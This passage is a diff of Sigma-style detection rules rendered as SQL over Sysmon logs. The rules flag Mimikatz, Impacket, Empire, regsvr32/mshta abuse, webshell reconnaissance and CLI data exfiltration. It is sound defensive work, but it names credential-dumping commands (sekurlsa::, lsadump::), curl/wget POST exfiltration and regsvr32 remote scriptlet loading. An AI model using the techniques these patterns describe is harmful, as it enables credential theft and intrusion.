ESCAPE '\\' OR Image LIKE '%\\\\tasklist.exe' ESCAPE '\\') OR OriginalFileName IN ('whoami.exe', 'sysinfo.exe', 'quser.exe', 'ipconfig.exe', 'pathping.exe', 'tracert.exe', 'netstat.exe', 'schtasks.exe', 'VSSADMIN.EXE', 'wevtutil.exe', 'tasklist.exe')) OR (CommandLine LIKE '% Test-NetConnection %' ESCAPE '\\' OR CommandLine LIKE '%dir \\\\%' ESCAPE '\\')))" - ], - "filename": "proc_creation_win_webshell_detection.yml" - }, - { - "title": "HackTool - GMER Rootkit Detector and Remover Execution", - "id": "9082ff1f-88ab-4678-a3cc-5bcff99fc74d", - "status": "experimental", - "description": "Detects the execution GMER tool based on image and hash fields.", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.defense_evasion" - ], - "falsepositives": [ - "Unlikely" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\gmer.exe' ESCAPE '\\' OR (Hashes LIKE '%MD5=E9DC058440D321AA17D0600B3CA0AB04%' ESCAPE '\\' OR Hashes LIKE '%SHA1=539C228B6B332F5AA523E5CE358C16647D8BBE57%' ESCAPE '\\' OR Hashes LIKE '%SHA256=E8A3E804A96C716A3E9B69195DB6FFB0D33E2433AF871E4D4E1EAB3097237173%' ESCAPE '\\') OR md5 = 'e9dc058440d321aa17d0600b3ca0ab04' OR sha1 = '539c228b6b332f5aa523e5ce358c16647d8bbe57' OR sha256 = 'e8a3e804a96c716a3e9b69195db6ffb0d33e2433af871e4d4e1eab3097237173'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 'MSHTA.EXE') AND ((ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\') AND (CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))) OR ((Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 'MSHTA.EXE') AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%.htm%' ESCAPE '\\' OR CommandLine LIKE '%.hta%' ESCAPE '\\') OR (CommandLine LIKE '%mshta.exe' ESCAPE '\\' OR CommandLine LIKE '%mshta' ESCAPE '\\')))))" ], - "filename": "proc_creation_win_hktl_gmer.yml" + "filename": "proc_creation_win_mshta_susp_pattern.yml" }, { - "title": "PowerShell Base64 Encoded WMI Classes", - "id": "1816994b-42e1-4fb1-afd2-134d88184f71", + "title": "Regsvr32 Anomaly", + "id": "8e2b24c9-4add-46a0-b4bb-0057b4e6187d", "status": "experimental", - "description": "Detects calls to base64 encoded WMI class such as \"Win32_Shadowcopy\", \"\"...etc.", - "author": "Christian Burkard (Nextron Systems), Nasreddine Bencherchali", + "description": "Detects various anomalies in relation to regsvr32.exe", + "author": "Florian Roth (Nextron Systems), oscd.community, Tim Shelton", "tags": [ - "attack.execution", - "attack.t1059.001", "attack.defense_evasion", - "attack.t1027" + "attack.t1218.010", + "car.2019-04-002", + "car.2019-04-003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND ((CommandLine LIKE '%VwBpAG4AMwAyAF8AUwBoAGEAZABvAHcAYwBvAHAAeQ%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBTAGgAYQBkAG8AdwBjAG8AcAB5A%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfU2hhZG93Y29we%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX1NoYWRvd2NvcH%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9TaGFkb3djb3B5%' ESCAPE '\\') OR (CommandLine LIKE '%VwBpAG4AMwAyAF8AUwBjAGgAZQBkAHUAbABlAGQASgBvAGIA%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAFMAYwBoAGUAZAB1AGwAZQBkAEoAbwBiA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBTAGMAaABlAGQAdQBsAGUAZABKAG8AYg%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfU2NoZWR1bGVkSm9i%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX1NjaGVkdWxlZEpvY%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9TY2hlZHVsZWRKb2%' ESCAPE '\\') OR (CommandLine LIKE '%VwBpAG4AMwAyAF8AUAByAG8AYwBlAHMAcw%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAFAAcgBvAGMAZQBzAHMA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzA%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfUHJvY2Vzc%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX1Byb2Nlc3%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9Qcm9jZXNz%' ESCAPE '\\') OR (CommandLine LIKE '%VwBpAG4AMwAyAF8AVQBzAGUAcgBBAGMAYwBvAHUAbgB0A%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAFUAcwBlAHIAQQBjAGMAbwB1AG4AdA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBVAHMAZQByAEEAYwBjAG8AdQBuAHQA%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfVXNlckFjY291bn%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX1VzZXJBY2NvdW50%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9Vc2VyQWNjb3Vud%' ESCAPE '\\') OR (CommandLine LIKE '%VwBpAG4AMwAyAF8ATABvAGcAZwBlAGQATwBuAFUAcwBlAHIA%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAEwAbwBnAGcAZQBkAE8AbgBVAHMAZQByA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBMAG8AZwBnAGUAZABPAG4AVQBzAGUAcg%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfTG9nZ2VkT25Vc2Vy%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX0xvZ2dlZE9uVXNlc%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9Mb2dnZWRPblVzZX%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\') OR (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND (ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\')) OR (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '%/i:%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\' AND CommandLine LIKE '%scrobj.dll' ESCAPE '\\') OR (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '%/i:%' ESCAPE '\\' AND CommandLine LIKE '%ftp%' ESCAPE '\\' AND CommandLine LIKE '%scrobj.dll' ESCAPE '\\') OR ((Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\') AND ParentImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\') OR (Image LIKE '%\\\\EXCEL.EXE' ESCAPE '\\' AND CommandLine LIKE '%..\\\\..\\\\..\\\\Windows\\\\System32\\\\regsvr32.exe %' ESCAPE '\\') OR (ParentImage LIKE '%\\\\mshta.exe' ESCAPE '\\' AND Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\') OR (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND (CommandLine LIKE '%\\\\AppData\\\\Local%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public%' ESCAPE '\\')) OR (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND (CommandLine LIKE '%.jpg' ESCAPE '\\' OR CommandLine LIKE '%.jpeg' ESCAPE '\\' OR CommandLine LIKE '%.png' ESCAPE '\\' OR CommandLine LIKE '%.gif' ESCAPE '\\' OR CommandLine LIKE '%.bin' ESCAPE '\\' OR CommandLine LIKE '%.tmp' ESCAPE '\\' OR CommandLine LIKE '%.temp' ESCAPE '\\' OR CommandLine LIKE '%.txt' ESCAPE '\\'))) AND NOT (((CommandLine LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\WebEx\\\\WebEx64\\\\Meetings\\\\atucfobj.dll%' ESCAPE '\\')) OR (ParentImage LIKE 'C:\\\\Program Files\\\\Box\\\\Box\\\\FS\\\\streem.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\Program Files\\\\Box\\\\Box\\\\Temp\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%/s C:\\\\Windows\\\\System32\\\\RpcProxy\\\\RpcProxy.dll' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_base64_wmi_classes.yml" + "filename": "proc_creation_win_regsvr32_anomalies.yml" }, { - "title": "Sysmon Discovery Via Default Driver Altitude Using Findstr.EXE", - "id": "37db85d1-b089-490a-a59a-c7b6f984f480", + "title": "Potential CVE-2021-41379 Exploitation Attempt", + "id": "af8bbce4-f751-46b4-8d91-82a33a736f61", "status": "test", - "description": "Detects usage of \"findstr\" with the argument \"385201\". Which could indicate potential discovery of an installed Sysinternals Sysmon service using the default driver altitude (even if the name is changed).", - "author": "frack113", + "description": "Detects potential exploitation attempts of CVE-2021-41379 (InstallerFileTakeOver), a local privilege escalation (LPE) vulnerability where the attacker spawns a \"cmd.exe\" process as a child of Microsoft Edge elevation service \"elevation_service\" with \"LOCAL_SYSTEM\" rights", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1518.001" + "attack.privilege_escalation", + "attack.t1068" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND CommandLine LIKE '% 385201%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE', 'pwsh.dll')) AND (ParentImage LIKE '%\\\\elevation\\_service.exe' ESCAPE '\\' AND IntegrityLevel = 'System'))" ], - "filename": "proc_creation_win_findstr_sysmon_discovery_via_default_altitude.yml" + "filename": "proc_creation_win_exploit_cve_2021_41379.yml" }, { - "title": "Potential Recon Activity Via Nltest.EXE", - "id": "5cc90652-4cbd-4241-aa3b-4b462fa5a248", + "title": "Script Event Consumer Spawning Process", + "id": "f6d1dd2f-b8ce-40ca-bc23-062efb686b34", "status": "experimental", - "description": "Detects nltest commands that can be used for information discovery", - "author": "Craig Young, oscd.community, Georg Lauenstein", + "description": "Detects a suspicious child process of Script Event Consumer (scrcons.exe).", + "author": "Sittikorn S", "tags": [ - "attack.discovery", - "attack.t1016", - "attack.t1482" + "attack.execution", + "attack.t1047" ], "falsepositives": [ - "Legitimate administration use but user and host must be investigated" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\nltest.exe' ESCAPE '\\' OR OriginalFileName = 'nltestrk.exe') AND ((CommandLine LIKE '%/server%' ESCAPE '\\' AND CommandLine LIKE '%/query%' ESCAPE '\\') OR (CommandLine LIKE '%/dclist:%' ESCAPE '\\' OR CommandLine LIKE '%/parentdomain%' ESCAPE '\\' OR CommandLine LIKE '%/domain\\_trusts%' ESCAPE '\\' OR CommandLine LIKE '%/all\\_trusts%' ESCAPE '\\' OR CommandLine LIKE '%/trusted\\_domains%' ESCAPE '\\' OR CommandLine LIKE '%/user%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\scrcons.exe' ESCAPE '\\' AND (Image LIKE '%\\\\svchost.exe' ESCAPE '\\' OR Image LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\msbuild.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_nltest_recon.yml" + "filename": "proc_creation_win_scrcons_susp_child_process.yml" }, { - "title": "HackTool - Mimikatz Execution", - "id": "a642964e-bead-4bed-8910-1bb4d63e3b4d", + "title": "HackTool - Empire PowerShell Launch Parameters", + "id": "79f4ede3-402e-41c8-bc3e-ebbf5f162581", "status": "test", - "description": "Detection well-known mimikatz command line arguments", - "author": "Teymur Kheirkhabarov, oscd.community, David ANDRE (additional keywords), Tim Shelton", + "description": "Detects suspicious powershell command line parameters used in Empire", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.t1003.002", - "attack.t1003.004", - "attack.t1003.005", - "attack.t1003.006" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unlikely" + "Other tools that incidentally use the same command line parameters" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%DumpCreds%' ESCAPE '\\' OR CommandLine LIKE '%mimikatz%' ESCAPE '\\') OR (CommandLine LIKE '%::aadcookie%' ESCAPE '\\' OR CommandLine LIKE '%::detours%' ESCAPE '\\' OR CommandLine LIKE '%::memssp%' ESCAPE '\\' OR CommandLine LIKE '%::mflt%' ESCAPE '\\' OR CommandLine LIKE '%::ncroutemon%' ESCAPE '\\' OR CommandLine LIKE '%::ngcsign%' ESCAPE '\\' OR CommandLine LIKE '%::printnightmare%' ESCAPE '\\' OR CommandLine LIKE '%::skeleton%' ESCAPE '\\' OR CommandLine LIKE '%::preshutdown%' ESCAPE '\\' OR CommandLine LIKE '%::mstsc%' ESCAPE '\\' OR CommandLine LIKE '%::multirdp%' ESCAPE '\\') OR (CommandLine LIKE '%rpc::%' ESCAPE '\\' OR CommandLine LIKE '%token::%' ESCAPE '\\' OR CommandLine LIKE '%crypto::%' ESCAPE '\\' OR CommandLine LIKE '%dpapi::%' ESCAPE '\\' OR CommandLine LIKE '%sekurlsa::%' ESCAPE '\\' OR CommandLine LIKE '%kerberos::%' ESCAPE '\\' OR CommandLine LIKE '%lsadump::%' ESCAPE '\\' OR CommandLine LIKE '%privilege::%' ESCAPE '\\' OR CommandLine LIKE '%process::%' ESCAPE '\\' OR CommandLine LIKE '%vault::%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '% -NoP -sta -NonI -W Hidden -Enc %' ESCAPE '\\' OR CommandLine LIKE '% -noP -sta -w 1 -enc %' ESCAPE '\\' OR CommandLine LIKE '% -NoP -NonI -W Hidden -enc %' ESCAPE '\\' OR CommandLine LIKE '% -noP -sta -w 1 -enc%' ESCAPE '\\' OR CommandLine LIKE '% -enc SQB%' ESCAPE '\\' OR CommandLine LIKE '% -nop -exec bypass -EncodedCommand %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_mimikatz_command_line.yml" + "filename": "proc_creation_win_hktl_empire_powershell_launch.yml" }, { - "title": "Sticky Key Like Backdoor Execution", - "id": "2fdefcb3-dbda-401e-ae23-f0db027628bc", + "title": "HackTool - Impacket Tools Execution", + "id": "4627c6ae-6899-46e2-aa0c-6ebcb1becd19", "status": "test", - "description": "Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen", - "author": "Florian Roth (Nextron Systems), @twjackomo, Jonhnathan Ribeiro, oscd.community", + "description": "Detects the execution of different compiled Windows binaries of the impacket toolset (based on names or part of their names - could lead to false positives)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.persistence", - "attack.t1546.008", - "car.2014-11-003", - "car.2014-11-008" + "attack.execution", + "attack.t1557.001" ], "falsepositives": [ - "Unlikely" + "Legitimate use of the impacket tools" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\winlogon.exe' ESCAPE '\\' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wt.exe' ESCAPE '\\') AND (CommandLine LIKE '%sethc.exe%' ESCAPE '\\' OR CommandLine LIKE '%utilman.exe%' ESCAPE '\\' OR CommandLine LIKE '%osk.exe%' ESCAPE '\\' OR CommandLine LIKE '%Magnify.exe%' ESCAPE '\\' OR CommandLine LIKE '%Narrator.exe%' ESCAPE '\\' OR CommandLine LIKE '%DisplaySwitch.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\goldenPac%' ESCAPE '\\' OR Image LIKE '%\\\\karmaSMB%' ESCAPE '\\' OR Image LIKE '%\\\\kintercept%' ESCAPE '\\' OR Image LIKE '%\\\\ntlmrelayx%' ESCAPE '\\' OR Image LIKE '%\\\\rpcdump%' ESCAPE '\\' OR Image LIKE '%\\\\samrdump%' ESCAPE '\\' OR Image LIKE '%\\\\secretsdump%' ESCAPE '\\' OR Image LIKE '%\\\\smbexec%' ESCAPE '\\' OR Image LIKE '%\\\\smbrelayx%' ESCAPE '\\' OR Image LIKE '%\\\\wmiexec%' ESCAPE '\\' OR Image LIKE '%\\\\wmipersist%' ESCAPE '\\') OR (Image LIKE '%\\\\atexec\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\dcomexec\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\dpapi\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\findDelegation\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\GetADUsers\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\GetNPUsers\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\getPac\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\getST\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\getTGT\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\GetUserSPNs\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\ifmap\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\mimikatz\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\netview\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\nmapAnswerMachine\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\opdump\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\psexec\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\rdp\\_check\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\sambaPipe\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\smbclient\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\smbserver\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\sniffer\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\sniff\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\split\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\ticketer\\_windows.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_cmd_sticky_key_like_backdoor_execution.yml" + "filename": "proc_creation_win_hktl_impacket_tools.yml" }, { - "title": "Potential Data Exfiltration Activity Via CommandLine Tools", - "id": "7d1aaf3d-4304-425c-b7c3-162055e0b3ab", + "title": "Webshell Detection With Command Line Keywords", + "id": "bed2a484-9348-4143-8a8a-b801c979301c", "status": "experimental", - "description": "Detects the use of various CLI utilities exfiltrating data via web requests", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects certain command line parameters often used during reconnaissance activity via web shells", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, Anton Kutepov, oscd.community", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.persistence", + "attack.t1505.003", + "attack.t1018", + "attack.t1033", + "attack.t1087" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') AND (CommandLine LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\' OR CommandLine LIKE '%wget %' ESCAPE '\\' OR CommandLine LIKE '%curl %' ESCAPE '\\') AND CommandLine LIKE '% -ur%' ESCAPE '\\' AND CommandLine LIKE '% -me%' ESCAPE '\\' AND CommandLine LIKE '% -b%' ESCAPE '\\' AND CommandLine LIKE '% POST %' ESCAPE '\\') OR (Image LIKE '%\\\\curl.exe' ESCAPE '\\' AND CommandLine LIKE '%--ur%' ESCAPE '\\' AND (CommandLine LIKE '% -d %' ESCAPE '\\' OR CommandLine LIKE '% --data %' ESCAPE '\\'))) AND ((CommandLine LIKE '%ToBase64String%' ESCAPE '\\' OR CommandLine LIKE '%whoami%' ESCAPE '\\' OR CommandLine LIKE '%nltest%' ESCAPE '\\' OR CommandLine LIKE '%ifconfig%' ESCAPE '\\' OR CommandLine LIKE '%hostname%' ESCAPE '\\' OR CommandLine LIKE '%net view%' ESCAPE '\\' OR CommandLine LIKE '%qprocess%' ESCAPE '\\' OR CommandLine LIKE '%netstat%' ESCAPE '\\' OR CommandLine LIKE '%systeminfo%' ESCAPE '\\' OR CommandLine LIKE '%tasklist%' ESCAPE '\\' OR CommandLine LIKE '%sc query%' ESCAPE '\\') OR (CommandLine LIKE '%type %' ESCAPE '\\' AND CommandLine LIKE '% > %' ESCAPE '\\' AND CommandLine LIKE '% C:\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\caddy.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\ws\\_tomcatservice.exe' ESCAPE '\\') OR ((ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentImage LIKE '%-tomcat-%' ESCAPE '\\' OR ParentImage LIKE '%\\\\tomcat%' ESCAPE '\\')) OR ((ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (CommandLine LIKE '%catalina.jar%' ESCAPE '\\' OR CommandLine LIKE '%CATALINA\\_HOME%' ESCAPE '\\'))) AND ((OriginalFileName IN ('net.exe', 'net1.exe') AND (CommandLine LIKE '% user %' ESCAPE '\\' OR CommandLine LIKE '% use %' ESCAPE '\\' OR CommandLine LIKE '% group %' ESCAPE '\\')) OR (OriginalFileName = 'ping.exe' AND CommandLine LIKE '% -n %' ESCAPE '\\') OR (CommandLine LIKE '%&cd&echo%' ESCAPE '\\' OR CommandLine LIKE '%cd /d %' ESCAPE '\\') OR (OriginalFileName = 'wmic.exe' AND CommandLine LIKE '% /node:%' ESCAPE '\\') OR ((Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\quser.exe' ESCAPE '\\' OR Image LIKE '%\\\\ipconfig.exe' ESCAPE '\\' OR Image LIKE '%\\\\pathping.exe' ESCAPE '\\' OR Image LIKE '%\\\\tracert.exe' ESCAPE '\\' OR Image LIKE '%\\\\netstat.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\tasklist.exe' ESCAPE '\\') OR OriginalFileName IN ('whoami.exe', 'sysinfo.exe', 'quser.exe', 'ipconfig.exe', 'pathping.exe', 'tracert.exe', 'netstat.exe', 'schtasks.exe', 'VSSADMIN.EXE', 'wevtutil.exe', 'tasklist.exe')) OR (CommandLine LIKE '% Test-NetConnection %' ESCAPE '\\' OR CommandLine LIKE '%dir \\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_data_exfiltration_via_cli.yml" + "filename": "proc_creation_win_webshell_detection.yml" }, { - "title": "MpiExec Lolbin", - "id": "729ce0ea-5d8f-4769-9762-e35de441586d", + "title": "PUA - AdFind Suspicious Execution", + "id": "9a132afa-654e-11eb-ae93-0242ac130002", "status": "test", - "description": "Detects a certain command line flag combination used by mpiexec.exe LOLBIN from HPC pack that can be used to execute any other binary", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects AdFind execution with common flags seen used during attacks", + "author": "Janantha Marasinghe (https://github.com/blueteam0ps), FPT.EagleEye Team, omkar72, oscd.community", "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1218" + "attack.discovery", + "attack.t1018", + "attack.t1087.002", + "attack.t1482", + "attack.t1069.002" ], "falsepositives": [ - "Unknown" + "Legitimate admin activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\mpiexec.exe' ESCAPE '\\' OR Imphash = 'd8b52ef6aaa3a81501bdfff9dbb96217' OR Hashes LIKE '%IMPHASH=d8b52ef6aaa3a81501bdfff9dbb96217%' ESCAPE '\\') AND (CommandLine LIKE '% /n 1 %' ESCAPE '\\' OR CommandLine LIKE '% -n 1 %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%domainlist%' ESCAPE '\\' OR CommandLine LIKE '%trustdmp%' ESCAPE '\\' OR CommandLine LIKE '%dcmodes%' ESCAPE '\\' OR CommandLine LIKE '%adinfo%' ESCAPE '\\' OR CommandLine LIKE '% dclist %' ESCAPE '\\' OR CommandLine LIKE '%computer\\_pwdnotreqd%' ESCAPE '\\' OR CommandLine LIKE '%objectcategory=%' ESCAPE '\\' OR CommandLine 